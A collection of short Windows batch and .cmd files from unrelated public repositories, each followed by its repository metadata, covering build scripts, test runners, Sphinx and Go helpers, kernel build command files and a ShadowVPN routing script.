echo 2. ½âѹapache-maven£¬²¢ÉèÖÃϵͳ±äÁ¿MAVEN_HOMEΪ½âѹµÄ³ÌÐòĿ¼¡£
echo 3. Ìí¼ÓPATH±äÁ¿µ½%%MAVEN_HOME%%\bin£¬²¢¼ì²éJAVA_HOMEÅäÖÃÊÇ·ñÕýÈ·¡£
echo 4. ÔËÐÐÌáʾ·ûÔËÐÐmvn -v ¼ì²é°²×°ÊÇ·ñ³É¹¦¡£
echo 5. ±àÒëwar°üµ½releaseĿ¼¡£
echo ****************************************************************************
REM ÉèÖòÎÊý±äÁ¿
SET WORK_FOLDER=%~dp0
echo --µ±Ç°¹¤×÷µÄĿ¼ÊÇ[%WORK_FOLDER%]
echo --Çå³ýÏîÄ¿»º´æ
if exist %WORK_FOLDER%release\ rd /s /q %WORK_FOLDER%release\ >nul
if not exist %WORK_FOLDER%release md %WORK_FOLDER%release >nul
echo --¿ªÊ¼±àÒë
if exist %WORK_FOLDER%pom.xml (
call "%MAVEN_HOME%\bin\mvn" -q clean package -f %WORK_FOLDER%pom.xml
if exist %WORK_FOLDER%\target\*.war copy /y %WORK_FOLDER%\target\*.war %WORK_FOLDER%release\ >nul
if exist %WORK_FOLDER%\target\ rd /s /q %WORK_FOLDER%\target\
)
echo --±àÒëÍê³É
|
color-coding/ibas-typescript
|
compile_packages.bat
|
bat
|
apache-2.0
| 1,182 |
gcc.exe -o bellman.exe bellman.c evolve_bitwise.c lib.c readfile.c textconv.c universe.c writefile.c -O3 -Wall -Wextra -fno-stack-protector -march=native -Werror -fmax-errors=2
|
simeksgol/BellmanWin_szlim
|
mk.bat
|
bat
|
bsd-2-clause
| 177 |
cd ..
call npm run live
|
fabrikaodua/chat-demo
|
tasks/livereload.bat
|
bat
|
mit
| 23 |
@echo off
for /f "tokens=1" %%i in ('Helpers\GetProjectFileName.cmd') do set ueFile=%%i
echo %ueFile:~0,-9%
|
gameraccoon/rubiks-cube-ue4
|
Scripts/Helpers/GetProjectName.cmd
|
bat
|
mit
| 109 |
@ECHO OFF
SET EXTNAME="extension-android-immersive"
REM Build extension
zip -r %EXTNAME%.zip haxelib.json include.xml java extension
haxelib local %EXTNAME%.zip
|
fbricker/extension-android-immersive
|
buildAndInstall.bat
|
bat
|
mit
| 162 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OUTSPS.S03_CheckListDefination.MSOUTSPS_S03_TC04_VerifyDocumentLibrary /testcontainer:..\..\MS-OUTSPS\TestSuite\bin\Debug\MS-OUTSPS_TestSuite.dll /runconfig:..\..\MS-OUTSPS\MS-OUTSPS.testsettings /unique
pause
|
XinwLi/Interop-TestSuites-1
|
SharePoint/Source/Scripts/MS-OUTSPS/RunMSOUTSPS_S03_TC04_VerifyDocumentLibrary.cmd
|
bat
|
mit
| 303 |
cmd_drivers/video/omap2/displays/built-in.o := rm -f drivers/video/omap2/displays/built-in.o; ar rcs drivers/video/omap2/displays/built-in.o
|
madhwang/linuxKernel
|
drivers/video/omap2/displays/.built-in.o.cmd
|
bat
|
gpl-2.0
| 142 |
cmd_drivers/media/common/tuners/built-in.o := rm -f drivers/media/common/tuners/built-in.o; arm-none-linux-gnueabi-ar rcs drivers/media/common/tuners/built-in.o
|
EAVR/EV3.14
|
ev3sources/extra/linux-03.20.00.13/drivers/media/common/tuners/.built-in.o.cmd
|
bat
|
gpl-2.0
| 162 |
cmd_arch/x86/tools/relocs := gcc -o arch/x86/tools/relocs arch/x86/tools/relocs_32.o arch/x86/tools/relocs_64.o arch/x86/tools/relocs_common.o
|
acheron1502/android_kernel_BLU_BLU_PURE_XL
|
arch/x86/tools/.relocs.cmd
|
bat
|
gpl-2.0
| 146 |
call build_xXX.cmd x86 fre wxp
|
ten0s/bthmsdevemul
|
src/freebt/src/driver/fbtusb/build_fre_wxp_x86.cmd
|
bat
|
gpl-3.0
| 30 |
@echo off
rem %1 = architecture
rem %2 = library type (LIB|DLL)
rem %3 = platform (Win32|x64)
rem %4 = configuration (Release|Debug)
rem %5 = build tests (|+tests)
if "%4" NEQ "" if "%3" NEQ "" if "%2" NEQ "" if "%1" NEQ "" goto cont
echo usage: msbuild arcitecture library_type=^<LIB^|DLL^> platform=^<Win32^|x64^> configuration=^<Release^|Debug^>
goto :eof
:cont
rem example use: msbuild sandybridge_ivybridge dll x64 release
if /i "%2" EQU "DLL" (set libp=dll) else (if /i "%2" EQU "LIB" (set libp=lib) else ((call :seterr & echo ERROR: library type is "lib" or "dll" ^(not "%2"^) & exit /b %errorlevel%)))
if /i "%3" EQU "x64" (set plat=x64) else (if /i "%3" EQU "Win32" (set plat=win32) else (call :seterr & echo ERROR: platform is "Win32" or "x64" ^(not "%3"^) & exit /b %errorlevel%))
if /i "%4" EQU "Debug" (set conf=Debug) else (if /i "%4" EQU "Release" (set conf=Release) else (call :seterr & echo ERROR: configuration is "Release" or "Debug" ^(not "%4"^) & exit /b %errorlevel%))
set src=%libp%_mpir_%1
rem This is the directory where Microsoft MSBUILD is installed
set msbdir="C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin"
rem This is the Visual Studio build directory (within the MPIR directory)
set srcdir="."
%msbdir%\msbuild.exe /p:Platform=%plat% /p:Configuration=%conf% %srcdir%\%src%\%src%.vcxproj
if /i "%libp%" == "LIB" (
%msbdir%\msbuild.exe /p:Platform=%plat% /p:Configuration=%conf% %srcdir%\lib_mpir_cxx\lib_mpir_cxx.vcxproj
)
if /i "%5" EQU "+tests" (
for /d %%d in (mpir-tests\*) do (
for %%f in (%%d\*.vcxproj) do (
%msbdir%\msbuild.exe /property:SolutionDir=..\..\ /property:OutDir=..\..\%plat%\%conf%\ /p:Platform=%plat% /p:Configuration=%conf% %%f
)
)
)
:clrerr
exit /b 0
:seterr
exit /b 1
|
jpflori/mpir
|
build.vc15/msbuild.bat
|
bat
|
gpl-3.0
| 1,788 |
call ..\..\utilities\findMatlab.bat
cd %~dp0
if %ismatlab%==1 (
start "Matlab" /b %matexe% -r "sigViewer();quit()"
) else (
echo sigViewer;quit | %matexe% %matopts%
)
|
bopjesvla/BCI
|
matlab/utilities/startSigViewer.bat
|
bat
|
gpl-3.0
| 174 |
c:\h\dev\projects\HxaBuild\HxaBuild.rb %1 HxaBuild-options-gcc.txt
|
hxa7241/p3tonemapper
|
library/build-gcc.bat
|
bat
|
lgpl-2.1
| 66 |
@if not defined flex_sdk (
@call properties.bat
)
@call "%flex_bin%\compc.bat" -o "%build_dir%\libs\AdvertisementPlugin.swc" ^
-debug=%debug% ^
-swf-version=11 ^
-target-player=10.2 ^
-sp "%advertisement_plugin%\src" ^
-is "%advertisement_plugin%\src" ^
-external-library-path+="%flex_sdk%\frameworks\libs" ^
-define CONFIG::LOGGING %logging%
|
kutu/GrindPlayer
|
advertisement.bat
|
bat
|
mit
| 352 |
xwalk.exe http://player.kuwo.cn/webmusic/play
|
qiuzhong/crosswalk-test-suite
|
misc/sampleapp-windows-tests/res/Kuwo_Music.bat
|
bat
|
bsd-3-clause
| 46 |
@ECHO off
REM example client up script for windows
REM will be executed when client is up
REM all key value pairs in ShadowVPN config file will be passed to this script
REM as environment variables, except password
echo starting shadowvpn...
REM user-defined variables
REM SET orig_intf="Ethernet"
SET chnroutes="true"
SET remote_tun_ip=10.7.0.1
SET dns_server=8.8.8.8
for /F "tokens=5*" %%i in ('netsh interface ip show interfaces') do set "orig_intf=%%i"
REM exclude remote server in routing table
for /F "tokens=3" %%* in ('route print ^| findstr "\<0.0.0.0\>"') do set "orig_gw=%%*"
route add %server% %orig_gw% metric 5 > NUL
REM configure IP address and MTU of VPN interface
netsh interface ip set interface %orig_intf% ignoredefaultroutes=enabled > NUL
netsh interface ip set address name="%intf%" static %tunip% 255.255.255.0 > NUL
netsh interface ipv4 set subinterface "%intf%" mtu=%mtu% > NUL
REM change dns server
netsh interface ip set dns name="%intf%" static %dns_server% > NUL
REM change routing table
if %chnroutes%=="true" (
ECHO using split mode
rundll32.exe cmroute.dll,SetRoutes /STATIC_FILE_NAME addchnroutes.txt /DONT_REQUIRE_URL /IPHLPAPI_ACCESS_DENIED_OK
) else (
ECHO using global mode
)
REM checking if winxp
ver | find "5.1" > NUL
if %ERRORLEVEL%==0 (
route add 128.0.0.0 mask 128.0.0.0 %remote_tun_ip% metric 6 > NUL
route add 0.0.0.0 mask 128.0.0.0 %remote_tun_ip% metric 6 > NUL
) else (
netsh interface ipv4 add route 128.0.0.0/1 "%intf%" %remote_tun_ip% metric=6 > NUL
netsh interface ipv4 add route 0.0.0.0/1 "%intf%" %remote_tun_ip% metric=6 > NUL
)
REM ECHO default route changed to %remote_tun_ip%
REM ECHO %0 done
echo.
ECHO +++++++++++++++++++++++++++++++++++++
ECHO vpn successfully started !!!
ECHO +++++++++++++++++++++++++++++++++++++
echo.
ECHO press ctrl+c to stop shadowvpn...
|
naturs/shadowvpn-win
|
client_up.bat
|
bat
|
gpl-2.0
| 1,918 |
rem This skript demonstrates how to run oasp batches via commandline
java -cp "%~dp0\target\lib\*" -Doasp.db.port=8143 io.oasp.module.batch.common.base.SpringBootBatchCommandLine io.oasp.gastronomy.restaurant.SpringBootBatchApp %*
|
SimonHuber/oasp4j
|
samples/batch/runbatch.bat
|
bat
|
apache-2.0
| 231 |
@echo off
REM Runs the Fusion Inventory agent, with the parameters passed in argument
REM by reparsing it, to solve strange bug between CFEngine and FusionInventory
REM Copyright (c) 2014 Normation SAS.
"c:\Program Files\FusionInventory-Agent\fusioninventory-agent.bat" %*
|
Kegeruneku/rudder-techniques
|
tools/run-inventory.bat
|
bat
|
gpl-3.0
| 275 |
executable = /bin/echo
arguments = job_dagman_subdag-A-lower1-node.cmd $(nodename) OK
universe = scheduler
log = job_dagman_subdag-A-lower1-node.log
notification = NEVER
getenv = true
output = job_dagman_subdag-A-lower1-node.$(nodename).out
error = job_dagman_subdag-A-lower1-node.err
queue
|
htcondor/htcondor
|
src/condor_tests/job_dagman_subdag-A-lower1-node.cmd
|
bat
|
apache-2.0
| 347 |
@echo off
setlocal
set VSCODE_DEV=
set ATOM_SHELL_INTERNAL_RUN_AS_NODE=1
call "%~dp0..\@@NAME@@.exe" "%~dp0..\resources\\app\\out\\cli.js" %*
endlocal
|
eklavyamirani/vscode
|
resources/win32/bin/code.cmd
|
bat
|
mit
| 155 |
conda list -p "%PREFIX%" --canonical
if errorlevel 1 exit 1
conda list -p "%PREFIX%" --canonical | grep "conda-build-test-python-build-1.0-0"
if errorlevel 1 exit 1
|
sandhujasmine/conda-build
|
tests/test-recipes/metadata/python_build/run_test.bat
|
bat
|
bsd-3-clause
| 165 |
:: Copyright 2012 The Go Authors. All rights reserved.
:: Use of this source code is governed by a BSD-style
:: license that can be found in the LICENSE file.
@echo off
setlocal
set GOBUILDFAIL=0
go tool dist env -wp >env.bat
if errorlevel 1 goto fail
call env.bat
del env.bat
echo.
if exist %GOTOOLDIR%\dist.exe goto distok
echo cannot find %GOTOOLDIR%\dist; nothing to clean
goto fail
:distok
"%GOBIN%\go" clean -i std
%GOTOOLDIR%\dist clean
goto end
:fail
set GOBUILDFAIL=1
:end
if x%GOBUILDEXIT%==x1 exit %GOBUILDFAIL%
|
xiaohaidao007/pandoraBox-SDK-mt7620
|
staging_dir/toolchain-mipsel_24kec+dsp_gcc-4.8-linaro_uClibc-1.0.x/golang/src/clean.bat
|
bat
|
gpl-2.0
| 531 |
set PATH=c:/usr/lib;%PATH%
set BUILD_DIR=%1%
shift
set JAGPDF_DIST_DIR=%1%
shift
set JAGPDF_SOURCE_DIR=%1%
shift
cd "%BUILD_DIR%"
call "c:\Program Files\Microsoft Visual Studio 9.0\VC\bin\vcvars32.bat"
cmake -G "NMake Makefiles" ^
-DCMAKE_BUILD_TYPE=Release ^
-DCMAKE_INSTALL_PREFIX=%JAGPDF_DIST_DIR% ^
-DPYTHON_INSTALL_DIR=%JAGPDF_DIST_DIR%/lib ^
-DFREETYPE_LIBRARY=c:/usr/src/freetype-2.3.9/objs/win32/vc2008/freetype239.lib ^
-DFREETYPE_INCLUDE_DIRS=c:/usr/src/freetype-2.3.9/include ^
-DZLIB_LIBRARY=c:/usr/src/zlib-1.2.3/projects/visualc6/Win32_DLL_Release/zlib1.lib ^
-DZLIB_INCLUDE_DIR=c:/usr/src/zlib-1.2.3 ^
-DPNG_LIBRARY=c:/usr/src/libpng-1.2.35/projects/visualc71/Win32_DLL_Release/libpng13.lib ^
-DPNG_PNG_INCLUDE_DIR=c:/usr/src/libpng-1.2.35 ^
-DICU_LIBRARY=c:/usr/src/icu-4.0.1/source/lib/icuuc.lib ^
-DICU_INCLUDE_DIR=c:/usr/src/icu-4.0.1/source/common ^
-DSWIG_EXECUTABLE=C:/usr/swigwin-1.3.39/swig.exe ^
-DBOOST_ROOT=c:/home/jarda/code/external/boost/boost_1_38_0 ^
-DBOOST_LIBRARYDIR=c:/home/jarda/code/external/boost/boost_1_38_0/lib ^
-DPYTHON_HOME=c:/programs/python26 ^
%* ../%JAGPDF_SOURCE_DIR%
if ERRORLEVEL 1 goto error
nmake
if ERRORLEVEL 1 goto error
nmake unit-tests
if ERRORLEVEL 1 goto error
nmake apitests
if ERRORLEVEL 1 goto error
nmake install
if ERRORLEVEL 1 goto error
exit 0
:error
echo NMake build error!
exit 1
|
jgresula/jagpdf
|
build/release-scripts/test_winxp_build.bat
|
bat
|
mit
| 1,361 |
REM
echo this batch file registers the custom control assembly with K2 smartforms
pause
iisreset
xcopy "K2Field.Controls.IPAddress.dll" "C:\Program Files (x86)\K2 blackpearl\K2 SmartForms Designer\bin\" /y /r
xcopy "K2Field.Controls.IPAddress.dll" "C:\Program Files (x86)\K2 blackpearl\K2 SmartForms Runtime\bin\" /y /r
@SET CMD="C:\Program Files (x86)\K2 blackpearl\Bin\controlutil.exe" register -assembly:"C:\Program Files (x86)\K2 blackpearl\K2 SmartForms Designer\bin\K2Field.Controls.IPAddress.dll"
%CMD%
|
timmes/K2Field.Controls.IPAddress
|
K2Field.Controls.IPAddress/RegisterCustomControl.bat
|
bat
|
mit
| 513 |
cls
grunt -v %1 %2 %3
|
pro-graphics/pro-motion-extensions
|
g.bat
|
bat
|
mit
| 21 |
@echo off
setlocal
if "%1" == "--help" (
echo Usage: rbenv local ^<version^>
echo rbenv local --unset
echo.
echo Sets the local application-specific Ruby version by writing the
echo version name to a file named `.ruby-version'.
echo.
echo When you run a Ruby command, rbenv will look for a `.ruby-version'
echo file in the current directory and each parent directory. If no such
echo file is found in the tree, rbenv will use the global Ruby version
echo specified with `rbenv global'. A version specified with the
echo `RBENV_VERSION' environment variable takes precedence over local
echo and global versions.
echo.
EXIT /B
)
rem Implementation of this command is in the rbenv.vbs file .
|
nak1114/rbenv-win
|
libexec/rbenv-local.bat
|
bat
|
mit
| 700 |
@ECHO OFF
pushd %~dp0
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set SOURCEDIR=source
set BUILDDIR=build
set SPHINXPROJ=pylleo
if "%1" == "" goto help
%SPHINXBUILD% >NUL 2>NUL
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
goto end
:help
%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS%
:end
popd
|
ryanjdillon/pylleo
|
doc/make.bat
|
bat
|
mit
| 814 |
@ECHO OFF
"Libraries\PATH Extensions\Hstart\hstart64.exe" /ELEVATE "%~dp0\Installation\Uninstall\InternalUninstall.bat"
|
paulmarsy/Console
|
Uninstall.bat
|
bat
|
mit
| 120 |
@echo off
"C:\Program Files (x86)\Diffuse\diffuse" webinstaller-php71-w64.iss webinstaller-php72-w64.iss webinstaller-php73-w64.iss
|
WPN-XM/WPN-XM
|
installers/diff-webinstaller.bat
|
bat
|
mit
| 134 |
:: Test build and execution wrapper for CoreFX tests
::
:: This wrapper is called for each of CoreFX's tests by runtest.cmd
::
:: %1 contains test folder
:: %2 contains test exe name
::
@echo OFF
setlocal ENABLEDELAYEDEXPANSION
set TestFolder=%1
::
:: We're only interested in referencing the xunit runner - the test dlls will be imported by the test wrapper project
::
set TestExecutable=xunit.console.netcore
set TestFileName=%2
:: Copy the artefacts we need to compile and run the xunit exe
copy /Y "%~dp0\runtest\CoreFXTestHarness\*" "%TestFolder%" >nul
:: Create log dir if it doesn't exist
if not exist %XunitLogDir% md %XunitLogDir%
if not exist %TestFolder%\%TestExecutable%.exe (
:: Not a test we support, exit silently
exit /b 0
)
:: Workaround until we have a better reflection engine
:: Add name of currently executing test to rd.xml
powershell -Command "(Get-Content %TestFolder%\default.rd.xml).replace('*Application*', '%TestFileName%') | Set-Content %TestFolder%\default.rd.xml"
if "%CoreRT_BuildArch%" == "x64" (
call "%VS140COMNTOOLS%\..\..\VC\bin\amd64\vcvars64.bat" >nul
)
echo Building %TestFileName%
call "%CoreRT_CliDir%\dotnet.exe" publish %TestFolder%\Test.csproj /ConsoleLoggerParameters:ForceNoAlign "/p:IlcPath=%CoreRT_ToolchainDir%" "/p:DebugSymbols=false" "/p:Configuration=%CoreRT_BuildType%" "/p:FrameworkLibPath=%~dp0..\..\bin\%CoreRT_BuildOS%.%CoreRT_BuildArch%.%CoreRT_BuildType%\lib" "/p:FrameworkObjPath=%~dp0..\..\bin\obj\%CoreRT_BuildOS%.%CoreRT_BuildArch%.%CoreRT_BuildType%\Framework" /p:DisableFrameworkLibGeneration=true /p:TestRootDir=%~dp0 /p:OSGroup=%CoreRT_BuildOS% /p:ExecutableName=%TestExecutable% /nologo
if errorlevel 1 (
echo Building %TestFileName% failed
exit /b 1
)
echo Executing %TestFileName% - writing logs to %XunitLogDir%\%TestFileName%.xml
if not exist "%TestFolder%\native\%TestExecutable%".exe (
echo ERROR:Native binary not found Unable to run test.
exit /b 1
)
call %TestFolder%\native\%TestExecutable% %TestFolder%\%TestFileName%.dll -xml %XunitLogDir%\%TestFileName%.xml
|
gregkalapos/corert
|
tests/CoreFX/build-and-run-test.cmd
|
bat
|
mit
| 2,084 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Neolib2.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Neolib2.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %BUILDDIR%/..
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end
|
jmgilman/neolib2
|
docs/make.bat
|
bat
|
gpl-2.0
| 6,703 |
cmd_init/built-in.o := /home/josh/gcc-linaro-arm-linux-gnueabihf-4.7-2013.04-20130415_linux/bin/arm-linux-gnueabihf-ld -EL -r -o init/built-in.o init/main.o init/version.o init/mounts.o init/initramfs.o init/calibrate.o
|
JoinTheRealms/TF700-dualboot-stockbased
|
init/.built-in.o.cmd
|
bat
|
gpl-2.0
| 225 |
cmd_drivers/acpi/pci_root.o := gcc -Wp,-MD,drivers/acpi/.pci_root.o.d -nostdinc -isystem /usr/lib/gcc/x86_64-linux-gnu/4.8/include -D__KERNEL__ -Iinclude -include include/linux/autoconf.h -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Os -Wframe-larger-than=2048 -fno-stack-protector -m32 -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2 -march=i686 -ffreestanding -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -Iinclude/asm-x86/mach-default -fomit-frame-pointer -Wdeclaration-after-statement -Wno-pointer-sign -Os -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(pci_root)" -D"KBUILD_MODNAME=KBUILD_STR(pci_root)" -c -o drivers/acpi/pci_root.o drivers/acpi/pci_root.c
deps_drivers/acpi/pci_root.o := \
drivers/acpi/pci_root.c \
include/linux/kernel.h \
$(wildcard include/config/lbd.h) \
$(wildcard include/config/preempt/voluntary.h) \
$(wildcard include/config/debug/spinlock/sleep.h) \
$(wildcard include/config/printk.h) \
$(wildcard include/config/numa.h) \
/usr/lib/gcc/x86_64-linux-gnu/4.8/include/stdarg.h \
include/linux/linkage.h \
include/asm/linkage.h \
$(wildcard include/config/x86/64.h) \
$(wildcard include/config/x86/32.h) \
$(wildcard include/config/x86/alignment/16.h) \
include/linux/stddef.h \
include/linux/compiler.h \
$(wildcard include/config/enable/must/check.h) \
$(wildcard include/config/enable/warn/deprecated.h) \
include/linux/compiler-gcc4.h \
include/linux/compiler-gcc.h \
$(wildcard include/config/arch/supports/optimized/inlining.h) \
$(wildcard include/config/optimize/inlining.h) \
include/linux/types.h \
$(wildcard include/config/uid16.h) \
$(wildcard include/config/lsf.h) \
$(wildcard include/config/resources/64bit.h) \
include/linux/posix_types.h \
include/asm/posix_types.h \
include/asm/posix_types_32.h \
include/asm/types.h \
$(wildcard include/config/highmem64g.h) \
include/asm-generic/int-ll64.h \
include/linux/bitops.h \
$(wildcard include/config/generic/find/first/bit.h) \
$(wildcard include/config/generic/find/next/bit.h) \
include/asm/bitops.h \
$(wildcard include/config/x86/cmov.h) \
include/asm/alternative.h \
$(wildcard include/config/smp.h) \
$(wildcard include/config/paravirt.h) \
include/asm/asm.h \
include/asm/cpufeature.h \
$(wildcard include/config/x86/invlpg.h) \
include/asm/required-features.h \
$(wildcard include/config/x86/minimum/cpu/family.h) \
$(wildcard include/config/math/emulation.h) \
$(wildcard include/config/x86/pae.h) \
$(wildcard include/config/x86/use/3dnow.h) \
include/asm-generic/bitops/sched.h \
include/asm-generic/bitops/hweight.h \
include/asm-generic/bitops/fls64.h \
include/asm-generic/bitops/ext2-non-atomic.h \
include/asm-generic/bitops/le.h \
include/asm/byteorder.h \
$(wildcard include/config/x86/bswap.h) \
include/linux/byteorder/little_endian.h \
include/linux/byteorder/swab.h \
include/linux/byteorder/generic.h \
include/asm-generic/bitops/minix.h \
include/linux/log2.h \
$(wildcard include/config/arch/has/ilog2/u32.h) \
$(wildcard include/config/arch/has/ilog2/u64.h) \
include/asm/bug.h \
$(wildcard include/config/bug.h) \
$(wildcard include/config/debug/bugverbose.h) \
include/asm-generic/bug.h \
$(wildcard include/config/generic/bug.h) \
include/linux/module.h \
$(wildcard include/config/modules.h) \
$(wildcard include/config/modversions.h) \
$(wildcard include/config/unused/symbols.h) \
$(wildcard include/config/module/unload.h) \
$(wildcard include/config/kallsyms.h) \
$(wildcard include/config/markers.h) \
$(wildcard include/config/sysfs.h) \
include/linux/list.h \
$(wildcard include/config/debug/list.h) \
include/linux/poison.h \
include/linux/prefetch.h \
include/asm/processor.h \
$(wildcard include/config/x86/vsmp.h) \
$(wildcard include/config/x86/ht.h) \
$(wildcard include/config/x86/debugctlmsr.h) \
include/asm/processor-flags.h \
include/asm/vm86.h \
